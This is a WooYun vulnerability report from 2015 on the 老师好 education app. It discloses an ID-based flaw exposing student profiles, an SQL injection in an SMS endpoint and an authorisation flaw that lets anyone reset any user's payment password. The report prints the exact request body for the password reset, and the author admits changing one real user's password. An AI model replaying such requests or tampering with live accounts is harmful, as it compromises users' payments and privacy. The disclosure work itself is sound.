漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0138886
漏洞标题:老师好两处越权漏洞打包(敏感信息泄漏)
相关厂商:必有我师教育科技
漏洞作者: 逆流冰河
提交时间:2015-09-08 12:30
修复时间:2015-10-26 08:50
公开时间:2015-10-26 08:50
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开
简要描述:
详细说明:
老师好APP,可以根据用户id,遍历全部学生信息
1,URL:http://**.**.**.**/api/api/student/profile/seconde/get/
第一个学生:
第二个学生:
从截图可以看到,根据user_id不同,可以会的不同的学习详细信息。
2,我就不全部遍历了,安全意识缺失,需要提高开发人员的安全意识。
3,顺便说一下
http://**.**.**.**/api/ubus/services/obtainCode
{"outboundtelno":"18551755691","type":"sms_regist"}
存在SQL注入,这个是赠送的,就不截图了,
漏洞证明:
好老师App,可以任意修改用户的支付密码,涉及全部用户
1,POST url:
http://**.**.**.**/api/api/user/pay/setpayPwd/
数据:
{data:{newpaypwd:"e55b5856c931641c7f8bf1678eb51641",userid:"402148807"},objId:"SetpayPwdRequest",token:"d6PN2A7IIgIP6DVnuhfDMboAw5LiWFgw",yid:"868017029187502"}
userid:402148807,可以随意变化,修改用户的支付密码
随便修改一个吧,罪过
成功了,没有任何保护措施。。。。。。
2,如果用户被盗,支付密码修改就非常容易了。这个漏洞需要紧急对应。
修复方案:
你懂得。
版权声明:转载请注明来源 逆流冰河@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2015-09-11 08:48
厂商回复:
暂未建立与网站管理单位的直接处置渠道,待认领.
最新状态:
暂无